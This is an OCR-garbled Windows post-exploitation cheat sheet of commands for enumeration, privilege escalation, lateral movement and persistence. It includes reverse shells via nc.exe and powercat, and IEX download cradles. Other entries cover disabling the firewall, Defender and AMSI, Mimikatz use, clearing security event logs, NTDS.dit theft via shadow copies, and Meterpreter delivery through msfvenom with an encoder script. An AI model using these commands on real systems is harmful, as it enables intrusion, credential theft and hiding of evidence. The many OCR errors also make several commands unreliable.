Comment on page




Number or ID
NT 3.1
Windows NT 3.1 (All)
NT 3.5
Windows NT 3.5 (All)
NT 3.51
Windows NT 3.51 (All)
NT 4.0
Windows NT 4.0 (All)
NT 5.0
Windows 2000 (All)
NT 5.1
Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
NT 5.2
Windows XP (64-bit, Pro 64-bit) Windows Server 2003 & R2 (Standard, Enterprise)
Windows Home Server
NT 6.0
Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate)
NT 6.1
Windows 7 (Starter, Home, Pro, Enterprise, Ultimate) Windows Server 2008 R2 (Foundation, Standard, Enterprise)
NT 6.2
Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) Windows Phone 8 Windows Server 2012 (Foundation, Essentials, Standard)


Usually C:\Windows
DNS Entities
Network settings
%SYSTEMROOT% system32 config\SAM
Username and password hash
Copy of SAM
Backup copy of SAM
Program reports
Security reports
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
Startup path
%USERPROFILE%\Start Menu\Programs\Startup\
Startup path
Path Prefetch (EXE reports)

Launcher paths

For WINDOWS NT 6.1,6.0

# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

For WINDOWS NT 5.2, 5.1, 5.0

%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup


%SystemDrive%\wmiOWS\Start Menu\Programs\Startup

for WINDOWS NT 4.0, 3.51, 3.50

%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup

System information commands

Operating system version
sc query state=all
Show services
tasklist /svc
Show process and services
tasklist /m
Show all processes and dlls
tasklist /S ip /v
Remotely running processes
taskkill /PID pid /F
Forced removal of the process
systeminfo /S ip /U domain\user /P Pwd
Receive system information remotely
reg query \ ip \ RegDomain \ Key /v VALUE
Send a query to the registry, /s=all values
reg query HKLM /f password /t REG_SZ /s
Registry search for passwords
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WSUS address
fsutil fsinfo drives
List of drivers • need admin access
dir /a /s /b c:'.pdf’
Search for all pdf files
dir /a /b c:\windows\kb’
Search for patches
findstr /si password’ .txt I •.xmll •.xls
Search files for passwords
tree /F /A c: tree.txt
List of folders on drive C:
reg save HKLM\Security security.hive
Save security hives inside the file
Current user
whoami /priv
Current user permissions

command net/domain

net view /domain
Current domain host
net view /domain: [MYDOMAIN]
hosts in [MYDOMAIN]
net user /domain
All users of the current domain
net user user pass /add
Add user
net localgroup "Administrators" user /add
Add user to Administrators
net accounts /domain
Domain password policies
net localgroup "Administrators"
List of Local Admins
net group /domain
List of domain groups
net group "Domain Admins" /domain
List of Admin users in the domain
net group "Domain Controllers" /domain
List of DCs for the current domain
net share
SMB share
net session I find I "\"
List of active SMB sessions
net user user /ACTIVE:yes /domain
Open domain domain
net user user '' newpassword '' /domain
Change domain username and password
net share share c:\share
Shared folder

Remote commands

tasklist /S ip /v
Processes running on ip
systeminfo /S ip /U domain\user /P Pwd
IP information
net share \\ ip
ip environment
net use \\ ip
ip system file
net use z: \\ ip \share password
/user: DOMAIN user
Map drive, specified
reg add \\ ip \ regkey \ value
Added registry key for ip
sc \\ ip create service
binpath=C:\Windows\System32\x.exe start=auto
Create a remote service
(space after start=)
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:/windows/temp/nc.exe
Copy file from ip to current system by cmd.exe
cmd.exe /c c:/windows/temp/nc.exe ip port -e cmd.exe
Shell reverse
nc.exe -lvvp port
Listening on specific port
python3 -m http.server port
Create webserver
xcopy /s \\ ip \dir C:\local
Copy of ip fodder
shutdown /m \\ ip /r /t 0 /f
restart system with ip

Network commands

ipconfig I all
ip settings
ipconfig /displaydns
DNS cache
netstat -ana
Show connection
netstat -anop tcp 1
Create Netstat loop
netstat -ani findstr LISTENING
Ports in use
route print
Route tables
arp -a
Get system MACs (using ARP table)
nslookup, set type=any, ls -d domain
results.txt, exit
Get DNS Zone Xfer
nslookup -type=SRV
Get Domain SRV lookup (ldap, kerberos, sip)
tftp -I ip GET remotefile
File Transfer in TFTP
netsh wlan show profiles
Profiles stored on the wireless network
netsh firewall set opmode disable
Firewall deactivation ('Old)
netsh wlan export profile folder=. key=clear
wifi extraction in plaintext
netsh interface ip show interfaces
List of IDs/MTUs related to interfaces
netsh interface ip set address local static
ip nmask gw ID
Set IP
netsh interface ip set dns local static ip
DNS server configuration
netsh interface ip set address local dhcp
Set interface to use DHCP

Functional commands

type file
Show file contents
del path \' .• /a /s /q /f
Delete files in current path
find /I ''str'' filename
command I find /c /v ""
List of cmd outputs
at HH:MM file [args] (i.e. at 14:45 cmd /c)
File execution schedule
runas /user: user " file [args]"
Execute file with specific user
restart /r /t 0
sc stop UsoSvc
Stop the UsoSvc service
sc start UsoSvc
Starting the UsoSvc service
sc config UsoSvc binpath="c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe"
Change path of executable file by UsoSvc
tr -d '\15\32' win.txt unix.txt
Delete CR & 'Z ('nix)
makecab file
Wusa.exe /uninstall /kb: ###
Delete patch
cmd.exe "wevtutil qe Application /c:40
/f:text /rd:true"
Using the Event Viewer in the CLI
Using Local user manager
Using Services control panel
Using Task manager
Using Security policy manager
Using Event viewer

MISC. commands

Locking the workstation

rundll32.dll user32.dll LockWorkstation

Disable Windows Firewall

netsh advfirewall set currentprofile state off netsh advfirewall set allprofiles state off

Create port forward (*need admin access)

netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=l.l.l.l

enable cmd

reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /t REG DWORD /d 0 /f

PSEXEC command

Remote file execution with specific identity information

psexec /accepteula \\ targetiP -u domain\user -p password -c -f \\ smbiP \share\file.exe

Execution of command with special hash

psexec /accepteula \\ ip -u Domain\user -p Lt1 c:\Program-1

Run the command on the remote system

psexec /accepteula \\ ip -s cmd.exe

Terminal service (RDP)

Start RDP

Create regfile.reg file with following line in it: HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService
"fDenyTSCo~nections"=dword: 00000000
reg import reg file. reg
net start ''terrnservice''
sc config terrnservice start= auto
net start terrnservice
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

RDP tunnel from port 443 (need to restart the terminal service)

REG ADD "HKLt1\System\CurrentControlSet\Control \Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

Remove network authentication by adding an exception in the firewall

reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable

Import task from XML file

schtasks.exe /create /tn t1yTask /xml "C:\MyTask.xml" /f

WMIC command

wmic [alias] get /?
List of all features
wmic [alias] call /?
Callable method
wmic process list full
process properties
wmic startupwmic service
start wmic service
wmic ntdomain list
Domain and DC information
wmic qfe
List of all patches
wrnic process call create "process_name"
Run process
wmic process where name="process" call
Delete process
wmic logicaldisk get description,name
Display logical sharing environment
wmic cpu get DataWidth /format:list
Show 32-bit or 64-bit version of the system
wmic service where started = true get name, startname
Show running services

WMIC [alias] [where] [clause]

[alias] == process, share, startup, service, nicconfig, useraccount, etc.
[where] ==where (name="cmd.exe"), where (parentprocessid!=[pid]"), etc.
[clause] ==list [fulllbrief], get [attribl, attrib2], call [method], delete

Run the file in smb with specific identity information

wmic /node: targetiP /user:domain\user /password:password process call create "\ \ smbiP \share\evil.exe"

Remove the software

wmic product get name /value # Get software names
wmic product where name="XXX" call uninstall /nointeractive

Remote user access

wmic /node:remotecomputer computersystern get username

Show processes in real time

wmic /node:machinename process list brief /every:l

Start RDP

wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
AllowTSConnections=''O'' call SetAllowTSConnections ''1''

The list of times that the user has entered

wmic netlogin where (name like "%adm%") get numberoflogons

Search services for unquoted routes

wmic service get narne,displayname,pathnarne,startrnode
| findstr /i nauton | findstr /i /v "C:\windows\\" | findstr /i /v """

Copy of Volume shadow

1. wmic /node: DC IP /user:"DOI1AIN\user" /password:"PASS" process
call create "cmd /c vssadmin list shadows 2 &1
# If any copies alread1 ex~st then exfil, otherwise create using
following commands. Check output.txt for anJ errors
2. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process
call create "cmd /c vssadmin create shadow /for=C: 2 &1
3. wmic /node: DC IP /user:"DOMAIN\user" /password:"PASS" process
call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVol~meShadowCopy1\Windows\System32\co nfig\SYSTEM
C:\temp\system.hive 2 &1
4. wmic /node: DC IP /user: "DOl'.llUN\user" /password: "PASS" process call create ''cmd /c copy
C:\temp\ntds.dit 2 &1 C:\temp\output.txt"
Step by step instructions on for step below
5. From Linux, download and run ntdsxtract and libesedb to export
hashes or other domain information
a. Additional instructions found under the VSSOWN section
b. ntdsxtract -
c. libesedb -

POWERSHELL environment

Stop recording
get-content file
Display the contents of the file
get-help command-examples
Display sample command
get-command ‘string’
Search for cmd
Show services (stopservice, start-service)
get-wmiobject -class win32 service
Show services with the same identity information
Show powershell version
powershell.exe -version 2.0
Run powershell 2.0 from version 3.0
get-service measure-object
Information returned from the service
List returned from PSDrives
get-process select -expandproperty name
show names
get-help ‘-parameter credential
Receive identity information
get-wmiobject -list -‘network’
WMI available on the network
(Net.DNS]: :GetnostEntry(” ip “I
Process DNS Lookup
powershell.exe wget “” -outfile “c:\temp\nc.exe”
Download and save the file
poweshell.exe -c “IEX (New-Object System.Net.WebClient).DownloadString(‘’); powercat -c -p 4444 -e cmd
reverse loose
Web server with port 8050
Use mimikatz
call ps1 files
Import-Module .\Invoke-Mimikatz.ps1
Download and save the file iwr -uri -o file.exe

Bypass AMSI

Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1
Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out
. .\AMSI-Bypass.ps1

Disable realtimemonitoring

powershell -command set-mpppreference -Disable realtimemonitoring $true

List of all users

$users = New-Object DirectoryServices.DirectorySearcher
$users.Filter = "(&(objectclass=user))"
$users.SearchRoot = ''

List of all domains

$computers = New-Object DirectoryServices.DirectorySearcher
$computers.Filter = "(&(objectclass=computer))"
$computers.SearchRoot = ''

Get AD credentials using donotrequirepreauth

Set-ADAccountControl -identity jorden -doesnotrequirepreauth 1

Deleting security reports and programs (for SVR01)

Get-EventLog -list
Clear-EventLog -logname Application, Security -computername SVR01

Extract the version of the operating system inside the CSV file

Get-WmiObject -class win32 operatingsystem | select -property ' |
export-csv c:\os.txt

List of running services

Get-Service | where_object {$_.status -eq "Running"}

Using ps drive for permanent sharing

New-PSJrive -Persist -PSProvider FileSjstem -Root \\\tools -Name i

Files written on 8/20

Get-Childitem -Path c:\ -Force -Rec~rse -Filter '.log -ErrorAction
SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}

Get file from http


tcp port connections (scanner)

$ports=(#,#,#) ;$ip="x.x.x.x";foreach ($port in $ports) {try
($socket=New-object Sjstem.Net.Sockets.TCPClient($ip,$port); }catch(};
if ($socket -eq $NULL) (echo $ip":"$port"- Closed";}
else(echo $ip":"$port"- Open";$socket =$NULL;}}

Ping command with 500 millisecond timeout

$ping = New-Object

Basic authentication window

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential(" title "," message "," user" "," domain")

Run the exe file (from cmd.exe) every 4 hours between August 8-11, 2013, device 0800-1700

powershell. exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match
'201308 ( 0 [ 8-9] |1 [0-1])-(0[ 8-9]]|1 [ 0-7]) [ 0-5] [ 0-9]') {Start-Process -
WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400))while(1)"

Run Powershell as

$pw ~ convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp ~ new-object -typename System.Management.Automation.PSCredential -
argument list "DOMAIN\user", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command
&{Start-Process file.exe -verb runas)'

Upload with powershell

𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙 𝑖𝑤𝑟 − 𝑢𝑠𝑒𝑏𝑎𝑠𝑖𝑐𝑝𝑎𝑟𝑠𝑖𝑛𝑔 ℎ𝑡𝑡𝑝://192.168.2. 𝑥/𝑆ℎ𝑎𝑟𝑝𝐻𝑜𝑢𝑛𝑑. 𝑒𝑥𝑒 − 𝑂𝑢𝑡𝐹𝑖𝑙𝑒 − 𝑆ℎ𝑎𝑟𝑝𝐻𝑜𝑢𝑛𝑑. 𝑒𝑥e

Email sender

powershell.exe Send-l-1ai1Hessage -to "email" -from "email" -subject
"Subject" -a "attachment file path" -body "Body" -SmtpServer Target
Email Server IP

Activating remote access to powershell (requires identity information)

net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item
wsman:\localhost\client\trustedhosts ''"
at \ \ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username

hostname and ip list for all domains

Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class
MicrosoftDNS _ ResourceRecord -Filter "domainname~' DOMAIN '" | select

Download from Powershell from specific path

powershell.exe -noprofile -noninteractive -command
"[System.Net.ServicePointManager] ::ServerCertificateValidationCallback =
{$true); $source="""https:ll YOUR SPECIFIED IP I """;
$destination="C:\"; $http = new-object Systern.Net.WebClient;
$response= $http.DownloadFile($source, $destination);"

Display Powershell data

Script will send a file ($filepath) via http to server ($server) via POST request.
Must have web server listening on port designated in the $server
powershell.exe -noprofile -noninteractive -command
"[S;stem.Net.ServicePointManager] ::ServerCertificateValidationCallback =
{$true); $server="""http:// YOUR_SPECIFIED IP / folder """;
$filepath="C:\" $http= new=object System.Net.WebClient;
$response= $http.UploadFile($server,$filepath);"

Using powershell to run meterpreter from memory

Need Metasploit v4.5+ (msfvenom supports Powershell)
Use Powershell (x86) with 32 bit Meterpreter payloads
encodeMeterpreter.psl script can be found on next page

in the attacking system

1. ./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86 LHOST= LPORT=443 audit.psl
2. Move audit.psl into same folder as encodeMeterpreter.psl
3. Launch Powershell (x86)
4. powershell.exe -executionpolicy bypass encodeMeterpreter.psl
5. Copy the encoded Meterpreter string

Start the listener in the attacking system

1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse https
4. set LHOST 1. 1. 1. 1
5. set LPORT 443
6. exploit -j

On the target system (run powershell(x86))

1. powershell. exe -noexi t -encodedCommand paste encoded Meterpreter
string here

Encodemeterpreter.ps1 [7]

# Get Contents of Script
$contents = Get-Content audit.psl
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]: :Compress
$cs =New-Object IO.Compression.DeflateStream ($ms,$action)
$sw =New-Object IO.StreamWriter ($cs, [Text.Encoding] ::ASCII)
$contents I ForEach-Object {$sw.WriteLine($ I)
# Base64 Encode Stream
$code= [Convert]: :ToBase64String($ms.ToArray())
$command= "Invoke-Expression '$(New-Object IO.StreamReader('$(New-Object
IO. Compression. DeflateStream ('$(New-Object IO. t4emoryStream
(, '$ ( [Convert] : : FromBase64String ('"$code'") ) I I ,
[IO.Compression.Compressiont~ode]: :Decompress) I,
[Text.Encoding]: :ASCII)) .ReadToEnd() ;"
# Invoke-Expression $command
$bytes= [System.Text.Encoding] ::Unicode.GetBytes($command)
$encodedCommand = [Convert]: :ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved. Please see reference [7] for disclaimer

Using powershell to start meterpreter (second method)

On bt attack box

1. msfpayload windows/rneterpreter/reverse tcp LHOST=
LPORT~8080 R I msfencode -t psh -a x86

in the attacking system

1. c:\powershell
3. PS c:\ $u = [System.Text.Encoding]: :Unicode.GetBytes($crnd)
4. PS c: \ $e = [Convert] ::ToBase64String($u)
5. PS c:\ $e
6. Copy contents of $e

Start the listener in the attacking system

1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse tcp
4. set LHOST
5. set LPORT 8080
6. exploit -j

In the target system (1: download the shell code, 2: execute)

1. c: \ powershell -noprofile -noninteracti ve -command " &
System.Net.WebClient; $client.DownloadFile('
', 'c:\windows\temp\shell.txt') )"
2. c: \ powershell -noprofile -noninteracti ve -noexi t -command " &
{$crnd~tjpe 'c:\windows\temp\shell.txt';powershell -noprofilenoninteractive
-noexit -encodedCornmand $cmd} "

Identification of vulnerable domains with powerup
. .\PowerUp.ps1

Windows registry

operating system information

HKLM\Software\Microsoft\Windows NT\CurrentVersion

Product Name

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v

Installation Date

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate

registered name

HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner

System boot information

HKLM\Software\~icrosoft\Windows NT\CurrentVersion /v SystemRoot

Time zone information (in minutes from UTC)

HKLM\System\CurrentControlSet\Control\TimeZoneinformation /v ActiveTirneBias

Map of network drivers

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive

Mounted devices


usb devices


Activation of IP forwarding

HKEY_LOCAL_~ACHI~E\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters -
IPEnableRouter = 1

Password keys: LSA secret cat certain vpn, autologon, other passwords

HKEY LOCAL MACHINE\Security\Policy\Secrets
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon

Audit policy information


Kernel and user services

HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services

software installed in the system


Installed software for the user


Latest documents


The last positions of the user

dtmu & \Opensavetmu

URLs typed

HKCU\Software\Microsoft\Internet Explorer\TypedURLs

MRU lists